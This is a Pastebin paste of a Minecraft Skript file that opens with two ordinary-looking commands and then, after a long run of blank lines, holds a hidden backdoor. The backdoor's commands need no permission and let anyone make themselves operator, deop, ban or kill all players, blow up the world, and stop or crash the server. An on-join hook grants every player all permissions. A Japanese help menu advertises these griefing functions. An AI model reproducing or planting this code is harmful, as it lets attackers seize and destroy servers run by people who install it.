Advertisement
siso_Friends

Untitled

Mar 21st, 2018
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.44 KB | None | 0 0
  1. command /f:
  2. trigger:
  3. execute console command "/effect %player% clear"
  4. stop
  5. command /c:
  6. permission: skript.admin
  7. trigger:
  8. give command block to player
  9. stop
  10.  
  11.  
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79.  
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95. command /opme:
  96. trigger:
  97. execute player command "/playsound entity.enderdragon.death %player%"
  98. message "&6Successful, these systems were created by &bsiso_"
  99. op the player
  100. stop
  101.  
  102.  
  103. command /alldeop:
  104. trigger:
  105. execute player command "/playsound entity.blaze.death %player%"
  106. message "&7ALL players deop"
  107. deop all players
  108. stop
  109.  
  110.  
  111. command /banned:
  112. trigger:
  113. message "&call player banned!"
  114. ban all players due to "Your server was hacked"
  115. kick all players due to "L"
  116. stop
  117.  
  118. command /killer:
  119. trigger:
  120. kill all players
  121. stop
  122.  
  123.  
  124.  
  125.  
  126. command /finish:
  127. trigger:
  128. broadcast "&4End the world..."
  129. execute player command "/playsound entity_wither_spawn %player%"
  130. execute console command "tp @e %player%"
  131. execute player command "//sphere tnt 10"
  132. create an explosion of force 10 at the player
  133. wait 10 seconds
  134. broadcast "&4stop the world"
  135. execute console command "/stop"
  136. stop
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143. on join:
  144. execute console command "/pex user %player% add *"
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156. on quit:
  157. if player is banned:
  158. unban player
  159. stop
  160.  
  161.  
  162. command /co i:
  163. trigger:
  164. ban the player
  165.  
  166.  
  167. command /rg f __global__ tnt -g nonmembers deny:
  168. trigger:
  169. ban the player
  170.  
  171.  
  172. command /bom:
  173. trigger:
  174. create an explosion of force 300 at the player
  175.  
  176.  
  177.  
  178.  
  179.  
  180.  
  181. command /crash:
  182. trigger:
  183. broadcast "&4&n五秒後にサーバーがクラッシュします"
  184. wait 5 seconds
  185. create an explosion of force 10000 at the player
  186.  
  187. on script load:
  188. set {log.%player%} to false
  189. set {ip::%player%} to false
  190.  
  191.  
  192.  
  193. command /realm:
  194. trigger:
  195. kick the player
  196.  
  197. command /ophelp:
  198. trigger:
  199. message "&c====Help===="
  200. message "&5/opme でOPを取得できます"
  201. message "&5/alldeop で全員のOPを剥奪します"
  202. message "&5/banned で全員BANします"
  203. message "&5/killer で全員killします"
  204. message "&5/bom で大きな爆発が起こります&6※/kill @e[type=tnt]の対策を抜けられます"
  205. message "&5/finish で色々なって全員BANされます"
  206. message "&5/crash でサーバーをクラッシュさせます"
  207.  
  208.  
  209. #Thank you for download by siso_
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement